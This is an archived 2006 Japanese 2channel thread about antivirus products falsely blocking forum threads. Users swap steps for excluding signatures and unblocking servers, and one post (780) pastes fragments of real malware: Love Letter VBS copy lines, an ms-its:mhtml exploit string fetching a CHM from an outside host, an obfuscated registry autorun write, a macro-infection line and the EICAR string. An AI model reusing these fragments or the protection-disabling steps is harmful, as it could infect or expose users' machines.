X



ノートン誤作動対策本部

■ このスレッドは過去ログ倉庫に格納されています
1動け動けウゴウゴ2ちゃんねる
垢版 |
2005/11/28(月) 16:08:40ID:bR9gbCGm0
詳細: 侵入を検出して遮断しました。 news19.2ch.net(206.223.151.67) とのすべての通信は 30 分間にわたって遮断されます。
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
708動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/23(木) 20:56:17ID:yEL+otgn0
今日から仲間入りしましたNAV2006です。
2006/03/24(金) 03:21:19ID:UTBvDXUa0
ご愁傷様
2006/03/24(金) 07:14:40ID:i9GBvAYP0
NGワードに指定しても引っかかるんだけど
2006/03/24(金) 08:46:06ID:vILNut4O0
>>710
読み込んでからNGワードかどうか判断するから意味ないと思われ。
2006/03/24(金) 09:07:22ID:i9GBvAYP0
>>711
だよねえ。
上の方に「あぼ〜んで対処できた」って書いてあったから試してみたけど、
通信の時点で遮断しちゃうんだからローカルあぼ〜んじゃ
どうにもならないよね。
2006/03/24(金) 09:18:19ID:sLk1Hgj90
専用ブラウザの動作によるんじゃねえのか?
2006/03/24(金) 11:56:58ID:wt38hkxO0
Jane viewならNGワードでOKだよ。
もちろん初回はダメね。
2006/03/24(金) 14:04:40ID:EI6FM7wb0
ガセw
2006/03/24(金) 14:16:06ID:xwm6rnKy0
一度ノートン切って取得してから、レス消去したらその後は問題なかったよ。
ホットゾヌ2です。
2006/03/24(金) 18:05:08ID:tQr3xHLo0
一度ノートンを通さずにスレ取得する部分が重要であって、あぼーんする必要は無いってことかな?
718動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 18:10:05ID:y5S9pPbQ0
このスレもウイルスがいるようだ。
ノートンが2度発動。しかも最新50で
2006/03/24(金) 19:23:19ID:bPqztrik0
>>717
ですね。
実際あぼーんしてなくても、いったん取得すれば問題ないし。
720動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/24(金) 21:22:57ID:hZPlzV+H0
誤作動に当たるのかわからんが、ノートン2005入れてて
今まで特に問題も無かったが最近エクセル開こうとしたら
「ウイルスチェックを開始します…」といって全く開けなくなった。
コレはどういうことなんですかね?解決策とかありますか?
2006/03/24(金) 21:27:39ID:r6Vhzw/P0
しらんがな
2006/03/24(金) 22:36:58ID:yqAK9A//0
まったくもって2ちゃんに関係ない
2006/03/24(金) 22:40:08ID:AY5Wzasy0
ここは2chのスレを見たらノートンが誤作動する人のスレです
2ch絡みでない誤作動の面倒を見るスレではありません

エクセルでの誤作動報告は当局に対して行ってください
2006/03/24(金) 22:49:05ID:98Y674mT0
つか運営系でノートンスレとあったら扱うのは2ch絡みのみ
それ以外は門前払いされるのは当然
2006/03/26(日) 00:52:32ID:XWLKIRWU0
アンチウイルス使ってるけど侵入検知とかって項目がない・・
しょうがなくAutoBlock見て解除してる
726動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 15:57:37ID:BZxZKTBW0
>>725
そうなんだよ、それが見つからなくて困ってここに来たよ。
2006/03/26(日) 16:24:59ID:pwaEyKGo0
>>726
参考までに・・・ただし、自己責任で

ノートンアンチウイルス2006 Ver.1
http://pc8.2ch.net/test/read.cgi/sec/1129452372/996

> まず、オプション→インターネット→インターネットワーム防止→除外の設定で、

> HTTP MSIE JavaScript OnLoad Rte CodeExecのチェックを外す。

> そのあと、オプション→インターネット→インターネットワーム防止→
> AutoBlockルール→現在、AutoBlockで遮断しているコンピュータで、

> 遮断解除してok。で、ok。
2006/03/26(日) 16:48:28ID:UrgZmqGG0
>>727
おお、ありがとうございます。見れました。

うち2005なのに今日から突然誤作動が始まった・・・なんなんだ。
2006/03/26(日) 17:19:42ID:Y3ON9q4k0
NAVの場合、こういう方法もあります。onload〜の場合のみ。

1.スレッドを見ると
「「HTTP MSIE Java Script OnLoad Ret CodeExec」の試みを検出して遮断しました。」
という反応をする。

2.Norton AntiVirusのオプションを開いて、インターネットワーム防止を選択、
AutoBlockルールのリストから先程のIPアドレスを消して、閉じる。
インターネットワーム防止をオンにするのチェックを外して無効にする。

3.スレッドを再取得

4.http://www.geocities.jp/cen_hp/program3.html を使って無効化

5.インターネットワーム防止をオンにするのチェックをして有効にする。
730動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:08:48ID:40HZ683F0
>>727
ν速だけ繋がらないから鯖落ちしてんのかと思った
おかげで助かりました
ありがとう
731動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:27:00ID:iC6tWHU/0
馬鹿コードをはれないように2ちゃんのほうでなんとかならないものかな?
うっとうしくってしかたない。
2006/03/26(日) 19:27:45ID:Y7phTP2S0
ノートンに頼みましょう
2006/03/26(日) 19:38:27ID:btlK6zh50
>>731
>>167
まあこの2人がこう発言しているから、やらないでしょう。
734動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 19:58:57ID:/R1Hc6p70
ノートンにしなきゃいい
735動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 20:08:42ID:/R1Hc6p70
フィギュアなんか誰も見ないし、しかも荒川出てないんだし・・・
736動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 20:11:55ID:/R1Hc6p70
・・・誤爆スマンカッタ
2006/03/26(日) 23:58:19ID:Rds5NGK80
(´-`).。oO(いちいちあげるか…)
2006/03/27(月) 00:57:22ID:3I+bmZi80
適当な文字を貼り付けるウイルス?あるじゃん
それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
分からない人の苦情が殺到して対応に追われるから。
>>167は危機感足りないんじゃ?
2006/03/27(月) 01:02:58ID:AmYXUlqp0
単なる文字列であって実行ファイルではないのに検知する仕様をどうにかするのと
2ch側の対応、どっちが早いかな。
2006/03/27(月) 01:21:18ID:NmoRfDPm0
コード貼り付けなんて何年前からあると思ってんの。
今更危機感足りないとか対応とか望んでも無駄でしょう。

無差別に爆撃ってことなら、コード貼り付け関係なくその爆撃自体は対応するでしょうけどね。
2006/03/27(月) 01:21:46ID:e6NTu7TL0
>>738
今までの対応の仕方をみていて、単なる野次馬の予想ですが。

>適当な文字を貼り付けるウイルス?あるじゃん
これは対応すると思うが(現に今もやっている)

>それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
>分からない人の苦情が殺到して対応に追われるから
こっちは対応いないんじゃないかな?

現に苦情が殺到中のコメントが>>167だった訳だし。
ノートンを切るか、2chに来ないかと言う答えになると思うよ。
2006/03/27(月) 02:08:38ID:CRZkjnUj0
ウィルスじゃないものに反応するものとしないもの、選択権はユーザーにあるわけで
シェアをトレンドマイクロに奪われたりすればシマンテックも誤作動対策に着手するかもしれないが
ユーザーに対策を押し付けるような商売してたら淘汰されるのも仕方ないと思う
2006/03/27(月) 03:02:31ID:stSyB+tW0
結局、「転んでも泣かない」が結論
744動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 07:09:30ID:GKKli8mx0
何でこのスレはいろいろはってあるのにスレが取得できるの?
745sage
垢版 |
2006/03/27(月) 07:24:02ID:8a4Se6FG0

出会い系⇔ニューリンク
2006/03/27(月) 10:02:20ID:7R1vXd2PO
強いて言えば、危機感足りてないのはシマンテック。
NGNG
シマンテックの日本支社はおそらく事態を把握してるだろうけど、
エンジンを書き換えるとなると本社の対応が必要なわけで、
「ある一つの掲示板が見られなくなる」ということの重要性が
あっちに伝わらないんだろうと思われ。

1000万人のネットユーザから不買運動されたらさすがに考えると
思うけど、そういう組織だった動きにもなっていないし。

もっとも、Antinny亜種の対応に追われている状況では
2ちゃんに対してあまり好意的にはなれないことも考えられるが。
2006/03/27(月) 12:45:20ID:/XC2wMgb0
> もっとも、Antinny亜種の対応に追われている状況では
> 2ちゃんに対してあまり好意的にはなれないことも考えられるが。

ウィルスがあってこそのアンチウィルスソフトだから、
新種ウィルスの発現はむしろ喜ばしく思ってたりするんじゃないスかね
2006/03/27(月) 12:49:35ID:rmERapPS0
この期に及んで2ちゃんでの誤作動に対応したら面白いな
仕様変更しない限り対応はしないんじゃねえかなぁ
それともユーザーが束になって苦情入れたら対応するのかな?
2006/03/27(月) 12:50:05ID:/XC2wMgb0
スレ違いの部分にレスをつけてしまった予感
もしくは恋の予感
ごめん
751動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 15:27:25ID:Jk15jv3kO
2ch対応
これだけで日本での売り上げが伸びるのにな
2006/03/27(月) 15:36:27ID:SAfGa+FD0
シマンテック本社に英文で熱烈なラブコールすればいいんじゃね?
NGNG
>>751
切に願う

ttp://dictionary.www.infoseek.co.jp/?sv=KO&qt=%C0%DA%A4%CB&sm=1&lp=0&se=on&gr=ml

>>752
言いだしっぺの(ry

ってラブレターなのかいw
http://pc7.2ch.net/test/read.cgi/pcqa/1109609938/365
無しの礫・・・
ソース入れたから撥ねられているんだろなぁ〜
Monazilla/1.00 (JaneView/0.1.12.1)
754動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 16:34:49ID:6NuGU2zF0
対応する気なんか無いでしょ。
2002のころから、正規ユーザーとしてバージョンアップごとに
シマンテックにはご注進してきたのに、ラブレター文字列すら対応しないんだもの。

今回も、ワーム防止に自分ルール追加しろ、って返事だったよ。
(2chのサーバIPアドレスを信頼するように設定して回避しろと)
755動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 16:58:55ID:vVYOuf/i0
さぁー回ってきましたっ!
この文を3〜10ヵ所に貼り付け、回してくださいw
これをやった貴方は絶対に夢や学校一のモテ仔に
なりますw
やんなかったら不幸が突撃します
もうココまで読んでしまった人は最低3ヵ所は回さないと絶対不幸が100%突撃して死亡するでしょう
この画像は最低3ヵ所回してから見てください
こちら
3〜10ヵ所って事は3箇所以上だったらなんでもいんですよっ!
やればやるほどし・あ・わ・せ!
これやった人は実際に
両思いになれたり、
学校一のモテ仔になれたり、
夢が叶ったり
欲しい物が手に入ったり。
一気に幸せが手に入ります
だから移せば移すほどお得!
成功した人の名前↓
山田三春
中野 純
その他にもたっくさん叶った人が居ます
だから回してね失敗した人なんて居ません
2006/03/27(月) 21:38:34ID:hQ0Nj+JU0
http://mickey.mirv.net/2chnis.html
にある対処方法(2chサーバのIPアドレスを除外する)はNISだけなんで、
NAV2005でそれらしい箇所探した。

「オプション」→「インターネットワーム防止」→「一般ルール」→「Default Non-Routable IPs」を「修正」→「処理」タブで「許可」→「コンピュータ」タブの「下のリストにあるコンピュータとサイトのみ」で「追加」→「個別」

のとこにコピペでいいと思う。右クリックで貼り付けがきかなかったので、Ctrl+Vでやった。
2006/03/27(月) 22:31:53ID:hM5eTmkR0
もしかして対応された?
遮断されるスレ開いても(ログも削除した)何も起きないんだけど
2006/03/27(月) 22:33:03ID:JGQYg4X+0
デジャブ
2006/03/28(火) 00:02:18ID:P/63CUXR0
2003だと対応の施しようがない・・・
2006/03/28(火) 21:07:54ID:TP3z61ts0
>>757
LiveUpdateしても、このスレを再所得すると反応するよ。
対応されていないのでは?
761動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/30(木) 19:46:50ID:+bc29xxf0
さっき先生が誤作動起した。
2ちゃんから攻撃されたので遮断しますたって
なんとか解除したけど
2006/03/31(金) 22:00:47ID:97YYo5Zc0
ノートンのソフト自体の終了方法ってないの?
タスクマネージャ見てもどれがどれだかさっぱり・・・。
2006/03/31(金) 23:28:25ID:tb37pHfX0
ノートンの機能自体の質問は板違いです
セキュリティ板のノートンスレとかシマンテックに聞け
2006/04/02(日) 01:06:00ID:m1WDj/aW0
当方AVGなんですが
http://tmp6.2ch.net/test/read.cgi/download/1142734610/
ここの2にAVGが反応するんですが
反応しないようにするにはどうしたらいいんですかね?
NGNG
そのスレをあぼーん。
ていうかうちもAVGだか、なんともないけどな?
2006/04/02(日) 03:11:11ID:DYw3aOAd0
おれもそっちは大丈夫
こっちがだめだ。875までは大丈夫だったんだけど
http://tmp6.2ch.net/test/read.cgi/download/1143304561/
2006/04/02(日) 16:52:52ID:8hEAiEMl0
>>764-766
まぁセキュリティ板行けって話だけど、AVGは有償のPro版でないと除外指定ができない。
2006/04/02(日) 16:55:22ID:YJTVT3eF0
昨日が3月32日だよ
2006/04/02(日) 16:56:11ID:YJTVT3eF0
誤爆スマソ
2006/04/02(日) 18:17:31ID:LqxABCFV0
今日ノートンが反応してここに誘導してもらって最初から読んでたけど、
NIS入れてないし侵入検知って項目も無いのに…て思ってたらNAVでも反応するのか。
ここまで読むの大変だったけどためになったわ有り難う
771動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/05(水) 06:28:02ID:L6X4AuEx0
当方マカフィーなのだが、下記のスレを取得しようとすると大激怒されて、
該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz

【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
ttp://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50


…時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
2006/04/05(水) 07:24:50ID:IemTuPtY0
>>771
マカフィーも反応するんだ。そこの9スレ目で。
2006/04/05(水) 07:31:20ID:q7ZYjZaA0
>>771
とりあえず製品の不具合(ウィルスじゃないものに反応する)はマカフィーに通報でいい
774動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>771-772
マカフィーを窓から投げ捨てろ。
さもなきゃ自分の頭を窓から投げ捨てろ。
2006/04/05(水) 07:44:55ID:IemTuPtY0
>>774
いやNIS2005だけどもうすぐ切れるからマカフィーにしようかなと。
2006/04/05(水) 22:06:28ID:vTdsxxJa0
アボーソすればいいじゃん。
漏れのノートン先生は無反応になったぜ。
専ブラ使っていれば、な。
777動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/06(木) 15:48:38ID:ogl3bSVi0
NAVの場合の設定を教えてくれー

インターネットワーム防止で
ナニをシグネチャ除外すれば良いんだ?
2006/04/06(木) 20:22:55ID:A4GZFMjG0
>>777
>>727
2006/04/06(木) 20:34:03ID:ogl3bSVi0
>>778
THX

HTTP MSIE JavaScript OnLoad Rte CodeExec

って 「MS IE」と別のとこにあるのな…ないよーと思って困ってました。
780動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/07(金) 10:26:14ID:9BaGKlIFO
ms-its:mhtml:file://C:\


c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


<body onload=window()>


c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub


G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC
2006/04/07(金) 10:34:49ID:7L7IH86h0
>>780
で?
NGNG
ν速だけでも
伝書鳩
2006/04/07(金) 23:59:38ID:B6Wm8s4l0
↑なにこれ
2006/04/08(土) 05:07:05ID:yUO2NZXw0
ウィルスコードだろ
2006/04/08(土) 14:52:00ID:0n8hZvPv0
2005でも誤作動するようになったな
専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい
2006/04/08(土) 18:22:00ID:3ZuAlp6E0
>>75で2chは問題なくなったがしたらばがまだだめだ
2006/04/08(土) 19:33:27ID:Dfxh+7wv0
にはは、こやつめ
2006/04/09(日) 08:35:16ID:qBdtQITt0
このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
あぼーんワードはどれですか?

今はNISを無効にしてカキコしています。
2006/04/09(日) 09:57:32ID:vW718YJi0
ログ読むと幸せになれるよ
2006/04/10(月) 18:40:26ID:6ukEWzx+0
>>521氏のレスを参考に汁
2006/04/10(月) 19:43:50ID:L1pXQnpL0
わかったにゃー
792788
垢版 |
2006/04/10(月) 23:20:01ID:2y1G/tIP0
>>510
>>512
>>517

これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。

>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。

で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。

2006/04/12(水) 15:42:54ID:ch5Pl/k40
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
先生よりアグレッシブだな
794動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/12(水) 16:23:57ID:QTtuslSa0
そのようだな

  ウィルスバスター蛾壊れた  
http://live22x.2ch.net/test/read.cgi/news/1144822966/
2006/04/12(水) 16:47:09ID:xZWLgV830
>>794
そしてもう対応
2006/04/12(水) 17:28:00ID:5RaY6XDD0
ああ、なんかさっきアップロードしおったのはそれか
2006/04/12(水) 18:58:07ID:1TPqXXUv0
まあ、あれだ。
アップデートとアップロードを間違えるのはここだけにしておけ。
2006/04/12(水) 20:31:16ID:5RaY6XDD0
素で間違えてた……orz
2006/04/13(木) 15:14:15ID:2EZeuwQo0
>>794
また誰かがウィルスコード貼ったのか…(泣

馬鹿フィーが大激怒 orz
800動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/15(土) 15:03:59ID:KVooKePH0
ダウン版見れないのはNISのせい?
2006/04/15(土) 15:34:28ID:28B7+P0x0
疑いを持ったなら
2006/04/15(土) 15:35:13ID:JEBS1g3C0
ノートン全部切ればわかる
2006/04/17(月) 22:27:09ID:jyqvkQIl0
道理だな。
2006/04/18(火) 01:55:50ID:jLocfvCR0
>>782はなに?
横棒と青字の伝書鳩ってなに
2006/04/18(火) 02:04:50ID:DZuh5+A/0
この板限定の機能
tasukeruyoするとuserAgent情報が表示される
でもスレ違い
Monazilla/1.00 (JaneStyle/2.23)
2006/04/18(火) 23:18:38ID:lCVacxaa0
すいません、私はノートンではなくシマンテックアンチウイルスを使ってるのですが、この場合はどのように対処すればいいんでしょうか
既出の問題でしたらすいません
2006/04/18(火) 23:21:27ID:cRD4gJ9i0
>>727
■ このスレッドは過去ログ倉庫に格納されています
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。

ニューススポーツなんでも実況